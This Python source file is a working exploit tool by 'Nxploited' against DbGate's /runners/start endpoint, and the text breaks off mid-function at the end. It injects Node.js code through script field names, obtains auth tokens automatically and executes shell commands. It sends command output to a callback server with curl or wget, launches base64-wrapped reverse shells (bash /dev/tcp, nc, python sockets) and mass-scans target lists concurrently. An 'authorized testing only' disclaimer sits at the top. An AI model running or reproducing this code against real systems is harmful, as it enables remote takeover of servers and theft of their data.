#!/usr/bin/env python3 # -*- coding: utf-8 -*- # By: Nxploited # # DbGate JSON runner assessment tool (POST /runners/start injection checks) # Patched in DbGate v7.1.9+. For authorized security testing only. from __future__ import annotations import argparse import asyncio import base64 import json import os import re import socket import sys import threading import time from dataclasses import dataclass from http.server import BaseHTTPRequestHandler, HTTPServer from typing import Any, Dict, List, Optional, Set, Tuple from urllib.parse import parse_qs, quote, urljoin, urlparse, urlunparse import aiohttp from colorama import Fore, Style, init as color_init color_init(autoreset=True) OUT_DIR = "Nx" OUT_VULN = "" OUT_DISPATCH = "" OUT_REVSH = "" OUT_EXFIL = "" OUT_FAIL = "" OUT_LIST_REPORT = "" OUT_SUMMARY = "" SESSION_DIR = "" SESSION_ID = "" DEFAULT_TARGETS = "list.txt" APP_NAME = "dbgate" DEFAULT_PORT = 3000 # DbGate default HTTP port DEFAULT_CONCURRENCY = 30 DEFAULT_TIMEOUT = 15.0 DEFAULT_CALLBACK_PORT = 8888 DEFAULT_REVSH_PORT = 4444 # ── logging ────────────────────────────────────────────────────────────────── def log_ok(msg: str) -> None: print(f"{Fore.GREEN}[+] {msg}{Style.RESET_ALL}") def log_info(msg: str) -> None: print(f"{Fore.CYAN}[*] {msg}{Style.RESET_ALL}") def log_warn(msg: str) -> None: print(f"{Fore.YELLOW}[!] {msg}{Style.RESET_ALL}") def log_fail(msg: str) -> None: print(f"{Fore.RED}[-] {msg}{Style.RESET_ALL}") def log_pwn(msg: str) -> None: print(f"{Fore.MAGENTA}[★] {msg}{Style.RESET_ALL}") _SAVE_WARNED: Set[str] = set() def save_line(path: str, line: str) -> None: if not path: return try: parent = os.path.dirname(path) if parent: os.makedirs(parent, exist_ok=True) with open(path, "a", encoding="utf-8") as fh: fh.write(line.rstrip() + "\n") fh.flush() except OSError as exc: if path not in _SAVE_WARNED: _SAVE_WARNED.add(path) log_warn(f"Cannot write to {path}: {exc}") def init_nx_output() -> str: """Create Nx/ output tree; call before any scan.""" global OUT_VULN, OUT_DISPATCH, OUT_REVSH, OUT_EXFIL, OUT_FAIL, OUT_LIST_REPORT, OUT_SUMMARY global SESSION_DIR, SESSION_ID os.makedirs(OUT_DIR, exist_ok=True) os.makedirs(os.path.join(OUT_DIR, "exfil"), exist_ok=True) SESSION_ID = time.strftime("%Y%m%d_%H%M%S") SESSION_DIR = os.path.join(OUT_DIR, "sessions", SESSION_ID) os.makedirs(SESSION_DIR, exist_ok=True) OUT_VULN = os.path.join(OUT_DIR, "vuln.txt") OUT_DISPATCH = os.path.join(OUT_DIR, "dispatch.txt") OUT_REVSH = os.path.join(OUT_DIR, "revsh.txt") OUT_EXFIL = os.path.join(OUT_DIR, "exfil.txt") OUT_FAIL = os.path.join(OUT_DIR, "failed.txt") OUT_LIST_REPORT = os.path.join(OUT_DIR, "list_report.txt") OUT_SUMMARY = os.path.join(SESSION_DIR, "summary.json") for p in (OUT_VULN, OUT_DISPATCH, OUT_REVSH, OUT_EXFIL, OUT_FAIL): open(p, "a", encoding="utf-8").close() log_ok(f"Output folder: {os.path.abspath(OUT_DIR)}/") log_info(f"Session: {SESSION_ID}") return SESSION_DIR def exfil_target_key(target_url: str) -> str: """Canonical key for per-target exfil matching (mass-safe).""" if not target_url or target_url == "unknown": return "unknown" return ensure_target_url(target_url).rstrip("/") def nx_exfil_path(target_url: str) -> str: tag = re.sub(r"[^\w.\-]+", "_", urlparse(target_url).netloc or "target") return os.path.join(OUT_DIR, "exfil", f"{tag}.txt") def save_exfil_for_target(target_url: str, peer: str, decoded: str) -> None: line = f"[{time.strftime('%Y-%m-%d %H:%M:%S')}] peer={peer}\n{decoded}\n{'─' * 40}" save_line(OUT_EXFIL, f"[{target_url}] {decoded[:500]}") save_line(nx_exfil_path(target_url), line) def url_tag(url: str) -> str: return urlparse(url).netloc or url # ── URL / targets ──────────────────────────────────────────────────────────── def normalize_base(url: str) -> str: url = url.strip() if not url: return "" if not re.match(r"^https?://", url, re.I): url = "http://" + url return url.rstrip("/") def ensure_target_url(raw: str, default_port: int = DEFAULT_PORT) -> str: """ Build a valid base URL: scheme://host:port/path Never appends port after path (fixes http://host/path:3000 bug). """ raw = normalize_base(raw) if not raw: return "" p = urlparse(raw) scheme = (p.scheme or "http").lower() host = p.hostname if not host: return "" if p.port is not None: port = p.port else: # DbGate default when line has no explicit port (http or https) port = default_port path = p.path or "" if path == "/": path = "" netloc = f"{host}:{port}" return urlunparse((scheme, netloc, path, "", p.query, p.fragment)) def load_targets_raw(path: str) -> List[str]: out: List[str] = [] try: with open(path, "r", encoding="utf-8") as fh: for line in fh: out.append(line.rstrip("\n\r")) except OSError as exc: log_fail(f"Cannot read targets: {exc}") return out @dataclass class ListLoadStats: raw: int = 0 blank: int = 0 comment: int = 0 invalid: int = 0 dup: int = 0 resolved: int = 0 def parse_target_line( line: str, default_port: int = DEFAULT_PORT, ) -> Tuple[Optional[str], str, str]: """ Returns (url, per_target_command, reason). Supports: host, host:port, URL, host/path, and optional |command per line. """ original = line per_cmd = "" work = line.strip() if not work: return None, "", "blank" if work.startswith("#"): return None, "", "comment" if "|" in work: host_part, _, cmd_part = work.partition("|") work = host_part.strip() per_cmd = cmd_part.strip() line = work if not re.match(r"^https?://", line, re.I): if re.match(r"^[\d.a-zA-Z_-]+:\d+", line) and "/" not in line.split(":")[0]: line = f"http://{line}" elif re.match(r"^[\d.a-zA-Z_.-]+(:\d+)?/", line): if not line.startswith("http"): line = f"http://{line}" elif re.match(r"^[\w.\-]+$", line) or re.match(r"^\d{1,3}(\.\d{1,3}){3}$", line): line = f"http://{line}" else: line = f"http://{line}" url = ensure_target_url(line, default_port) if not url or not urlparse(url).hostname: return None, per_cmd, f"invalid:{original[:80]}" return url, per_cmd, "" def load_targets_smart( path: str, default_port: int = DEFAULT_PORT, ) -> Tuple[List[str], Dict[str, str], ListLoadStats, List[str]]: """Load list file with stats; never mixes ports incorrectly.""" lines = load_targets_raw(path) stats = ListLoadStats(raw=len(lines)) seen: Set[str] = set() urls: List[str] = [] per_cmds: Dict[str, str] = {} errors: List[str] = [] for line in lines: if not line.strip(): stats.blank += 1 continue if line.strip().startswith("#"): stats.comment += 1 continue url, per_cmd, reason = parse_target_line(line, default_port) if reason == "blank": stats.blank += 1 continue if reason == "comment": stats.comment += 1 continue if not url: stats.invalid += 1 errors.append(f"{line.strip()} -> {reason}") continue if url in seen: stats.dup += 1 continue seen.add(url) urls.append(url) if per_cmd: per_cmds[url] = per_cmd stats.resolved += 1 return urls, per_cmds, stats, errors def write_list_report( path: str, stats: ListLoadStats, urls: List[str], errors: List[str], default_port: int = DEFAULT_PORT, per_cmds: Optional[Dict[str, str]] = None, ) -> None: lines = [ f"file={path}", f"raw={stats.raw} blank={stats.blank} comment={stats.comment}", f"invalid={stats.invalid} dup={stats.dup} resolved={stats.resolved}", f"default_port={default_port} (applied when line has no explicit port)", "", "=== resolved targets ===", ] for u in urls: cmd = (per_cmds or {}).get(u, "") lines.append(f"{u}|{cmd}" if cmd else u) if errors: lines.extend(["", "=== invalid lines ==="]) lines.extend(errors) try: with open(OUT_LIST_REPORT, "w", encoding="utf-8") as fh: fh.write("\n".join(lines) + "\n") except OSError as exc: log_warn(f"Cannot write list report: {exc}") def parse_login_json(raw: Optional[str]) -> Tuple[Optional[Dict[str, Any]], Optional[str]]: if not raw or not raw.strip(): return {"amoid": "none"}, None try: data = json.loads(raw) if not isinstance(data, dict): return None, "login JSON must be an object" return data, None except json.JSONDecodeError as exc: return None, f"invalid login JSON: {exc}" def guess_lan_ip() -> str: try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("8.8.8.8", 80)) ip = s.getsockname()[0] s.close() return ip except OSError: return "127.0.0.1" def extract_bearer_token(data: Any, raw_text: str = "") -> Optional[str]: """Pull Bearer token from DbGate /auth/login JSON (several response shapes).""" if isinstance(data, dict): for key in ("accessToken", "token", "access_token", "jwt", "bearer"): val = data.get(key) if val and isinstance(val, str): return val for nest in ("data", "result", "user", "session", "auth"): sub = data.get(nest) if isinstance(sub, dict): found = extract_bearer_token(sub) if found: return found if raw_text: for pattern in ( r'"accessToken"\s*:\s*"([^"]+)"', r'"token"\s*:\s*"([^"]+)"', r'"access_token"\s*:\s*"([^"]+)"', ): m = re.search(pattern, raw_text) if m: return m.group(1) return None class ReuseHTTPServer(HTTPServer): allow_reuse_address = True # ── injection builders ───────────────────────────────────────────────────────── def _js_escape_single(s: str) -> str: return ( s.replace("\\", "\\\\") .replace("'", "\\'") .replace("\n", "\\n") .replace("\r", "\\r") ) def parse_revsh_endpoint( spec: Optional[str], default_port: int = DEFAULT_REVSH_PORT, ) -> Tuple[str, int]: """ Parse LHOST:LPORT for reverse shell (address the *target* must dial). spec None / AUTO → guessed LAN IP + default_port. """ if spec is None or str(spec).strip().upper() == "AUTO" or not str(spec).strip(): return guess_lan_ip(), default_port raw = str(spec).strip() if raw.startswith("[") and "]" in raw: host = raw[1 : raw.index("]")] rest = raw[raw.index("]") + 1 :] if rest.startswith(":"): return host, int(rest[1:]) return host, default_port if ":" in raw: host, _, port_s = raw.rpartition(":") host = host.strip() if not host: raise ValueError(f"invalid reverse-shell endpoint: {spec!r}") return host, int(port_s) return raw, default_port def build_reverse_shell_cmd(lhost: str, lport: int) -> str: """ Detached reverse-shell attempts (async exec). Uses base64-wrapped script to avoid broken nested quoting inside sh -c. """ h, p = lhost, int(lport) script = ( f"bash -i >& /dev/tcp/{h}/{p} 0>&1 2>/dev/null || " f"sh -i >& /dev/tcp/{h}/{p} 0>&1 2>/dev/null || " f"rm -f /tmp/.nx;mkfifo /tmp/.nx;cat /tmp/.nx|sh -i 2>&1|nc {h} {p} >/tmp/.nx || " f"nc -e /bin/sh {h} {p} 2>/dev/null || " f"busybox nc {h} {p} -e sh 2>/dev/null || " f"python3 -c \"import socket,os,subprocess;" f"s=socket.socket();s.connect(('{h}',{p}));" f"os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);" f"subprocess.call(['/bin/sh','-i'])\" 2>/dev/null" ) payload_b64 = base64.b64encode(script.encode()).decode() return ( f"(command -v base64 >/dev/null 2>&1 && " f"echo {payload_b64}|base64 -d|nohup sh >/dev/null 2>&1 &) || " f"(echo {payload_b64}|openssl base64 -d|nohup sh >/dev/null 2>&1 &)" ) def build_node_exec_js(shell_cmd: str, sync: bool = True) -> str: esc = _js_escape_single(shell_cmd) if sync: return ( f"process.mainModule.require('child_process').execSync('{esc}'," f"{{encoding:'utf8',timeout:120000}})" ) return f"process.mainModule.require('child_process').exec('{esc}')" def build_shell_exfil( cmd: str, callback_url: str, b64: bool = True, target_tag: str = "", ) -> str: base = callback_url.rstrip("/") qs_parts: List[str] = [] if target_tag: qs_parts.append(f"target={quote(target_tag, safe='')}") cb_full = f"{base}?{'&'.join(qs_parts)}" if qs_parts else base # Run command once, encode once, then try curl then wget (no double exec). if b64: return ( f"__nx=$( ({cmd}) 2>&1 ); " f"b64=$(printf %s \"$__nx\" | base64 -w0 2>/dev/null " f"|| printf %s \"$__nx\" | base64 2>/dev/null || echo FAIL); " f"curl -sk -G '{cb_full}' --data-urlencode \"data=$b64\" " f"|| wget -qO- --post-data=\"data=$b64\" '{cb_full}'" ) return ( f"__nx=$( ({cmd}) 2>&1 ); " f"curl -sk -G '{cb_full}' --data-urlencode \"data=$__nx\" " f"|| wget -qO- --post-data=\"data=$__nx\" '{cb_full}'" ) def inject_function_name(node_js: str) -> str: return f"x;{node_js};//" def inject_variable_name(node_js: str, fn_safe: str = "x") -> Tuple[str, str]: return f"x;{node_js};var __nx", f"{fn_safe};//" def build_json_script( vector: str, node_js: str, props: Optional[Dict[str, Any]] = None, ) -> Dict[str, Any]: props = props or {} if vector == "functionName": return { "type": "json", "commands": [{ "type": "assign", "variableName": "x", "functionName": inject_function_name(node_js), "props": props, }], "packageNames": [], } if vector == "variableName": var_name, fn_name = inject_variable_name(node_js) return { "type": "json", "commands": [{ "type": "assign", "variableName": var_name, "functionName": fn_name, "props": props, }], "packageNames": [], } raise ValueError(f"Unknown vector: {vector}") # ── exfil listener ─────────────────────────────────────────────────────────── class ExfilHandler(BaseHTTPRequestHandler): hits: List[str] = [] hits_by_target: Dict[str, List[str]] = {} _lock = threading.Lock() @classmethod def hit_count(cls) -> int: with cls._lock: return len(cls.hits) @classmethod def hits_for_target(cls, target_url: str, baseline: int = 0) -> int: key = exfil_target_key(target_url) with cls._lock: entries = cls.hits_by_target.get(key, []) return max(0, len(entries) - baseline) def log_message(self, fmt: str, *args: Any) -> None: pass def _parse_request(self) -> Tuple[str, str, str]: peer = self.client_address[0] parsed = urlparse(self.path) qs = parse_qs(parsed.query) target_key = qs.get("target", [""])[0] if self.command == "POST": length = int(self.headers.get("Content-Length", 0)) body = self.rfile.read(length).decode("utf-8", errors="replace") bqs = parse_qs(body) raw = bqs.get("data", [body])[0] if not target_key: target_key = bqs.get("target", [""])[0] return raw, target_key, peer raw = qs.get("data", [""])[0] return raw, target_key, peer def do_GET(self) -> None: self._handle() def do_POST(self) -> None: self._handle() def _handle(self) -> None: raw, target_key, peer = self._parse_request() decoded = raw try: decoded = base64.b64decode(raw).decode("utf-8", errors="replace") except Exception: pass target_url = target_key or "unknown" line = ( f"[{time.strftime('%H:%M:%S')}] peer={peer} " f"target={target_url} | {decoded[:8000]}" ) store_key = exfil_target_key(target_url) if target_url != "unknown" else "unknown" with ExfilHandler._lock: ExfilHandler.hits.append(line) ExfilHandler.hits_by_target.setdefault(store_key, []).append(decoded) log_pwn(f"EXFIL [{target_url}] from {peer}: {decoded[:200]!r}") if target_url and target_url != "unknown": save_exfil_for_target(target_url, peer, decoded) else: save_line(OUT_EXFIL, line) self.send_response(200) self.send_header("Content-Type", "text/plain") self.end_headers() self.wfile.write(b"ok") def start_exfil_server( bind_host: str, port: int, max_tries: int = 25, ) -> Tuple[HTTPServer, int]: """ Start HTTP exfil listener. If port is busy (e.g. 4444 = msf), try next ports. """ bind = bind_host if bind_host else "0.0.0.0" last_err: Optional[OSError] = None for offset in range(max_tries): try_port = port + offset try: srv = ReuseHTTPServer((bind, try_port), ExfilHandler) threading.Thread(target=srv.serve_forever, daemon=True).start() if try_port != port: log_warn(f"Port {port} busy — listener using {try_port} instead") log_ok(f"Exfil listener bound on {bind}:{try_port}") return srv, try_port except OSError as exc: last_err = exc if getattr(exc, "errno", None) not in (48, 98, 10048): raise continue raise OSError( f"Could not bind {bind}:{port}-{port + max_tries - 1}: {last_err}" ) class TcpRevshListener: """TCP listener to verify reverse-shell connectivity from the target.""" def __init__(self, bind_host: str = "0.0.0.0", port: int = DEFAULT_REVSH_PORT) -> None: self.bind_host = bind_host or "0.0.0.0" self.port = port self._sock: Optional[socket.socket] = None self._conn: Optional[socket.socket] = None self.peer: Tuple[str, int] = ("", 0) self.banner: bytes = b"" def start(self, max_tries: int = 25) -> int: bind = self.bind_host last_err: Optional[OSError] = None for offset in range(max_tries): try_port = self.port + offset sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) try: sock.bind((bind, try_port)) sock.listen(1) self._sock = sock if offset > 0: log_warn( f"Revsh port {self.port} busy — listening on {try_port} instead" ) self.port = try_port log_ok(f"Reverse-shell listener on {bind}:{try_port}") return try_port except OSError as exc: last_err = exc sock.close() if getattr(exc, "errno", None) not in (48, 98, 10048): raise continue raise OSError( f"Could not bind revsh {bind}:{self.port}-{self.port + max_tries - 1}: {last_err}" ) def wait(self, timeout: float) -> bool: if not self._sock: return False self._sock.settimeout(timeout) try: conn, addr = self._sock.accept() self._conn = conn self.peer = (addr[0], addr[1]) conn.settimeout(2.0) try: self.banner = conn.recv(4096) except OSError: self.banner = b"" return True except socket.timeout: return False except OSError: return False def relay_interactive(self) -> None: """Best-effort line bridge after connect (use external nc for full TTY).""" conn = self._conn if not conn: return def _reader() -> None: while True: try: data = conn.recv(4096) if not data: break sys.stdout.write(data.decode("utf-8", errors="replace")) sys.stdout.flush() except OSError: break threading.Thread(target=_reader, daemon=True).start() log_info("Interactive relay — type commands; Ctrl+C to exit") try: while True: line = input() conn.sendall((line + "\n").encode()) except (EOFError, KeyboardInterrupt, OSError): pass def close(self) -> None: for s in (self._conn, self._sock): if s: try: s.close() except OSError: pass self._conn = None self._sock = None async def wait_revsh_async(listener: TcpRevshListener, timeout: float) -> bool: loop = asyncio.get_running_loop() return await loop.run_in_executor(None, listener.wait, timeout) def build_callback_url( callback_host: str, listen_port: int, scheme: str = "http", ) -> str: host = callback_host.strip() if not host: host = guess_lan_ip() if host in ("0.0.0.0", "::"): log_warn("Callback host cannot be 0.0.0.0 — use an IP reachable FROM the target") host = guess_lan_ip() log_info(f"Using guessed LAN IP for callback: {host}") return f"{scheme}://{host}:{listen_port}/" # ── DbGate client ────────────────────────────────────────────────────────────── class DbGateExploit: VECTORS = ("functionName", "variableName", "both") def __init__( self, base_url: str, timeout: float = DEFAULT_TIMEOUT, verify_ssl: bool = False, token: Optional[str] = None, login_body: Optional[Dict[str, Any]] = None, ): self.base_url = ensure_target_url(base_url) self.timeout = aiohttp.ClientTimeout(total=timeout) self.verify_ssl = verify_ssl self.token = token self.login_body = login_body or {"amoid": "none"} self.tag = urlparse(self.base_url).netloc or self.base_url self.last_vector_used = "" def _headers(self, with_auth: bool = True) -> Dict[str, str]: h = {"Content-Type": "application/json", "Accept": "application/json"} if with_auth and self.token: h["Authorization"] = f"Bearer {self.token}" return h async def _request( self, session: aiohttp.ClientSession, method: str, path: str, **kwargs: Any, ) -> Tuple[int, str, Any]: url = urljoin(self.base_url + "/", path.lstrip("/")) try: async with session.request( method, url, ssl=self.verify_ssl, timeout=self.timeout, **kwargs ) as resp: text = await resp.text() try: data = json.loads(text) if text.strip() else {} except json.JSONDecodeError: data = {"_raw": text} return resp.status, text, data except asyncio.TimeoutError: return 0, "timeout", {} except aiohttp.ClientError as exc: return 0, str(exc), {} async def probe_alive(self, session: aiohttp.ClientSession) -> bool: for path in ("/", "/api/status", "/status"): status, _, _ = await self._request(session, "GET", path) if status in (200, 401, 403, 404, 302): return True return False async def obtain_token(self, session: aiohttp.ClientSession) -> bool: if self.token: return True status, text, data = await self._request( session, "POST", "/auth/login", json=self.login_body, headers={"Content-Type": "application/json"}, ) if status != 200: log_fail(f"[{self.tag}] auth/login HTTP {status}: {text[:120]}") return False token = extract_bearer_token(data, text) if not token: log_fail( f"[{self.tag}] no token in login response " f"(HTTP {status}): {text[:160]}" ) return False self.token = token preview = token if len(token) < 24 else f"{token[:20]}...{token[-6:]}" log_ok(f"[{self.tag}] Bearer token auto-obtained ({preview})") return True async def runners_start( self, session: aiohttp.ClientSession, script: Dict[str, Any], ) -> Tuple[bool, Optional[str], str]: status, text, data = await self._request( session, "POST", "/runners/start", json={"script": script}, headers=self._headers(True), ) if status != 200: return False, None, f"HTTP {status}: {text[:200]}" if isinstance(data, dict) and data.get("errorMessage"): return False, None, str(data["errorMessage"]) runid = None if isinstance(data, dict): runid = data.get("runid") or data.get("runId") if runid or "runid" in text.lower(): return True, str(runid or "?"), text return False, None, text[:300] async def run_injection( self, session: aiohttp.ClientSession, vector: str, node_js: str, props: Optional[Dict[str, Any]] = None, ) -> Tuple[bool, Optional[str], str]: if vector == "both": ok, rid, err = await self.run_injection( session, "functionName", node_js, props ) if ok: self.last_vector_used = "functionName" return ok, rid, err ok, rid, err = await self.run_injection( session, "variableName", node_js, props ) if ok: self.last_vector_used = "variableName" return ok, rid, err self.last_vector_used = vector script = build_json_script(vector, node_js, props) return await self.runners_start(session, script) async def check_vulnerable( self, session: aiohttp.ClientSession, vector: str = "functionName", ) -> Tuple[bool, str]: probe_js = "void 0" ok, runid, err = await self.run_injection(session, vector, probe_js) if ok: v = self.last_vector_used or vector return True, f"runner-accepted vector={v} runid={runid}" return False, err async def execute_command( self, session: aiohttp.ClientSession, command: str, callback_url: Optional[str] = None, vector: str = "functionName", async_exec: bool = False, b64_exfil: bool = True, ) -> Tuple[bool, str]: shell = ( build_shell_exfil( command, callback_url, b64=b64_exfil, target_tag=self.base_url, ) if callback_url else command ) node_js = build_node_exec_js(shell, sync=not async_exec) ok, runid, err = await self.run_injection(session, vector, node_js) if ok: v = self.last_vector_used or vector return True, f"dispatched vector={v} runid={runid}" return False, err async def full_chain( self, command: str, callback_url: Optional[str] = None, vector: str = "functionName", check_only: bool = False, async_exec: bool = False, b64_exfil: bool = True, wait_exfil: float = 8.0, target_exfil_baseline: int = 0, use_reverse_shell: bool = False, wait_revsh: float = 15.0, revsh_listener: Optional[TcpRevshListener] = None, revsh_interactive: bool = False, ) -> str: """ fail — unreachable / auth fail / not vulnerable vuln — runner accepts injection probe (or exec without callback) dispatch — payload accepted; no confirmed output / no revsh connect exfil — callback received new data after dispatch (confirmed output) revsh — TCP reverse connection received on local listener """ connector = aiohttp.TCPConnector(ssl=self.verify_ssl, limit=1) async with aiohttp.ClientSession(connector=connector) as session: if not await self.probe_alive(session): log_fail(f"[{self.tag}] target not reachable") return "fail" if not await self.obtain_token(session): return "fail" vuln, detail = await self.check_vulnerable(session, vector) if not vuln: log_fail(f"[{self.tag}] not vulnerable / blocked: {detail}") return "fail" log_ok(f"[{self.tag}] VULNERABLE ({detail})") save_line(OUT_VULN, f"{self.base_url}|{detail}") if check_only: return "vuln" if not command: return "vuln" exec_async = async_exec or use_reverse_shell exec_cb = None if use_reverse_shell else callback_url ok, msg = await self.execute_command( session, command, callback_url=exec_cb, vector=vector, async_exec=exec_async, b64_exfil=b64_exfil, ) if not ok: log_fail(f"[{self.tag}] exec failed: {msg}") return "vuln" log_pwn(f"[{self.tag}] {msg}") out_file = OUT_REVSH if use_reverse_shell else OUT_DISPATCH save_line( out_file, f"{self.base_url}|cmd={command!r}|callback={callback_url or ''}|{msg}", ) if use_reverse_shell: if not revsh_listener: log_warn(f"[{self.tag}] no revsh listener — cannot verify connection") return "dispatch" log_info( f"[{self.tag}] waiting up to {wait_revsh:.0f}s for reverse TCP..." ) if await wait_revsh_async(revsh_listener, wait_revsh): peer = f"{revsh_listener.peer[0]}:{revsh_listener.peer[1]}" log_ok(f"[{self.tag}] reverse TCP connected from {peer}") if revsh_listener.banner: preview = revsh_listener.banner[:200] log_info(f" banner: {preview!r}") save_line( OUT_REVSH, f"{self.base_url}|peer={peer}|{msg}", ) if revsh_interactive: revsh_listener.relay_interactive() return "revsh" log_warn( f"[{self.tag}] payload dispatched but no reverse TCP " f"(firewall/Docker/no bash|nc; target must reach listener)" ) return "dispatch" if not callback_url: log_warn(f"[{self.tag}] no callback — blind dispatch only (not confirmed output)") return "vuln" got = await wait_for_exfil( wait_exfil, self.base_url, target_exfil_baseline, ) if got: log_ok(f"[{self.tag}] output received via callback") log_info(f" → {nx_exfil_path(self.base_url)}") return "exfil" log_warn( f"[{self.tag}] payload dispatched but no callback data " f"(check firewall/NAT/curl on target; callback={callback_url})" ) return "dispatch" # ── scan ─────────────────────────────────────────────────────────────────────── def exfil_received_for_target(target_url: str, target_baseline: int) -> bool: """True only if this target URL received new exfil (mass-safe, no global bleed).""" return ExfilHandler.hits_for_target(target_url, target_baseline) > 0 async def wait_for_exfil( wait_sec: float, target_url: str, target_baseline: int, poll_sec: float = 0.5, ) -> bool: """Poll until callback data arrives for this target only.""" if wait_sec <= 0: return exfil_received_for_target(target_url, target_baseline) deadline = time.monotonic() + wait_sec while True: if exfil_received_for_target(target_url, target_baseline): return True remaining = deadline - time.monotonic() if remaining <= 0: return False await asyncio.sleep(min(poll_sec, remaining)) def describe_result(result: str) -> str: return { "fail": "unreachable / auth failed / not vulnerable", "vuln": "runner accepted probe (no command output)", "dispatch": "payload accepted — no callback/revsh confirmation", "exfil": "callback received — command output confirmed", "revsh": "reverse TCP connection received (use --revsh-interactive for basic relay)", }.get(result, result) async def scan_one( target: str, command: str, callback_url: Optional[str], vector: str, check_only: bool, timeout: float, verify_ssl: bool, token: Optional[str], login_body: Optional[Dict[str, Any]], async_exec: bool, b64_exfil: bool, wait_exfil: float, ) -> str: client = DbGateExploit( target, timeout=timeout, verify_ssl=verify_ssl, token=token, login_body=login_body, ) t_key = exfil_target_key(target) with ExfilHandler._lock: t_base = len(ExfilHandler.hits_by_target.get(t_key, [])) try: return await client.full_chain( command=command, callback_url=callback_url, vector=vector, check_only=check_only, async_exec=async_exec, b64_exfil=b64_exfil, wait_exfil=wait_exfil, target_exfil_baseline=t_base, ) except Exception as exc: log_fail(f"[{client.tag}] {exc}") return "fail" async def mass_scan( targets: List[str], command: str, callback_url: Optional[str], vector: str, check_only: bool, concurrency: int, timeout: float, verify_ssl: bool, token: Optional[str], login_body: Optional[Dict[str, Any]], async_exec: bool, b64_exfil: bool, wait_exfil: float, target_commands: Optional[Dict[str, str]] = None, ) -> Dict[str, int]: sem = asyncio.Semaphore(concurrency) stats: Dict[str, int] = { "exfil": 0, "dispatch": 0, "vuln": 0, "fail": 0, } total = len(targets) done = 0 lock = asyncio.Lock() async def worker(t: str) -> None: nonlocal done cmd = (target_commands or {}).get(t) or command async with sem: result = await scan_one( t, cmd, callback_url, vector, check_only, timeout, verify_ssl, token, login_body, async_exec, b64_exfil, wait_exfil, ) async with lock: stats[result] = stats.get(result, 0) + 1 done += 1 pct = done / total * 100 print( f"{Fore.CYAN}[{done:>5}/{total} {pct:5.1f}%] " f"{Fore.MAGENTA}EXFIL={stats['exfil']} " f"{Fore.GREEN}DISP={stats['dispatch']} " f"{Fore.YELLOW}VULN={stats['vuln']} " f"{Fore.RED}FAIL={stats['fail']}" f"{Style.RESET_ALL}", end="\r", ) if result == "fail": save_line(OUT_FAIL, t) tasks = [asyncio.create_task(worker(t)) for t in targets] try: await asyncio.gather(*tasks) except KeyboardInterrupt: for t in tasks: t.cancel() print() return stats # ── interactive wizard ─────────────────────────────────────────────────────── def show_banner() -> None: os.system("cls" if os.name == "nt" else "clear") w = 84 print(Fore.MAGENTA + "═" * w + Style.RESET_ALL) print( Fore.WHITE + Style.BRIGHT + " DbGate JSON Runner — Interactive Assessment".center(w) + Style.RESET_ALL ) print(Fore.MAGENTA + "─" * w + Style.RESET_ALL) for line in ( "Mode : AUTO — one question (URL or list file), rest is automatic", "Auto : token · listener · port 3000 · vector=both · output→Nx/", f"Output : {OUT_DIR}/ (vuln · dispatch · exfil · failed · list_report)", "CLI : python Nx.py --cli -u http://host:3000 (full flags)", "Revsh : --cli -u URL --reverse-shell [LHOST:LPORT] (default LAN:4444)", "Note : DbGate >= 7.1.9 is patched", ): print(Fore.CYAN + f" • {line}" + Style.RESET_ALL) print(Fore.GREEN + Style.BRIGHT + " By: Nxploited".center(w) + Style.RESET_ALL) print(Fore.MAGENTA + "═" * w + Style.RESET_ALL) print() def ask(prompt: str, default: str = "") -> str: try: v = input(f"{Fore.CYAN} ▸ {prompt} [{default}]: {Style.RESET_ALL}").strip() return v if v else default except (EOFError, KeyboardInterrupt): return default def ask_yes(prompt: str, default: str = "n") -> bool: v = ask(prompt, default).lower() return v in ("y", "yes", "1", "true") def ask_int(prompt: str, default: int, lo: int = 1, hi: int = 10000) -> int: while True: raw = ask(prompt, str(default)) try: n = int(raw) if lo <= n <= hi: return n except ValueError: pass log_warn(f"Enter a number between {lo} and {hi}") def ask_float(prompt: str, default: float, lo: float = 0.0, hi: float = 600.0) -> float: while True: raw = ask(prompt, str(default)) try: n = float(raw) if lo <= n <= hi: return n except ValueError: pass log_warn(f"Enter a number between {lo} and {hi}") class RunConfig: def __init__(self) -> None: self.mode: str = "single" self.url: str = "" self.targets_file: str = DEFAULT_TARGETS self.default_port: int = DEFAULT_PORT self.check_only: bool = False self.command: str = "id" self.vector: str = "functionName" self.token: Optional[str] = None self.login_json: str = '{"amoid":"none"}' self.login_body: Optional[Dict[str, Any]] = None self.threads: int = DEFAULT_CONCURRENCY self.timeout: float = DEFAULT_TIMEOUT self.verify_ssl: bool = False self.async_exec: bool = False self.b64_exfil: bool = True self.wait_exfil: float = 8.0 self.use_callback: bool = True self.callback_url: Optional[str] = None self.listen_bind: str = "0.0.0.0" self.listen_port: int = DEFAULT_CALLBACK_PORT self.callback_host: str = "" self.use_builtin_listener: bool = True self.resolved_targets: List[str] = [] self.target_commands: Dict[str, str] = {} self.reverse_shell: bool = False self.revsh_lhost: str = "" self.revsh_lport: int = DEFAULT_REVSH_PORT self.revsh_bind: str = "0.0.0.0" self.wait_revsh: float = 15.0 self.revsh_interactive: bool = False self.mass_wait_exfil: float = 8.0 def detect_target_input(raw: str) -> Tuple[str, str, str]: """Return (mode, target, optional_command).""" raw = raw.strip() cmd = "" if not raw: return "single", "http://127.0.0.1:3000", "" if "|" in raw: raw, _, cmd = raw.partition("|") raw = raw.strip() cmd = cmd.strip() if raw.startswith("@"): raw = raw[1:].strip() looks_like_file = ( os.path.isfile(raw) or (not re.match(r"^https?://", raw, re.I) and raw.endswith(".txt")) ) if looks_like_file: return "mass", raw, cmd return "single", raw, cmd def apply_auto_defaults(cfg: RunConfig) -> None: """Fill everything automatically — no extra questions.""" cfg.login_body = {"amoid": "none"} cfg.token = None cfg.default_port = DEFAULT_PORT cfg.timeout = DEFAULT_TIMEOUT cfg.verify_ssl = False cfg.vector = "both" cfg.check_only = False cfg.command = "id" cfg.async_exec = False cfg.b64_exfil = True cfg.wait_exfil = 8.0 cfg.use_callback = True cfg.use_builtin_listener = True cfg.listen_bind = "0.0.0.0" cfg.listen_port = DEFAULT_CALLBACK_PORT cfg.callback_host = guess_lan_ip() cfg.callback_url = build_callback_url(cfg.callback_host, cfg.listen_port) cfg.threads = DEFAULT_CONCURRENCY cfg.mass_wait_exfil = 8.0 def print_auto_summary(cfg: RunConfig) -> None: print() log_info("AUTO 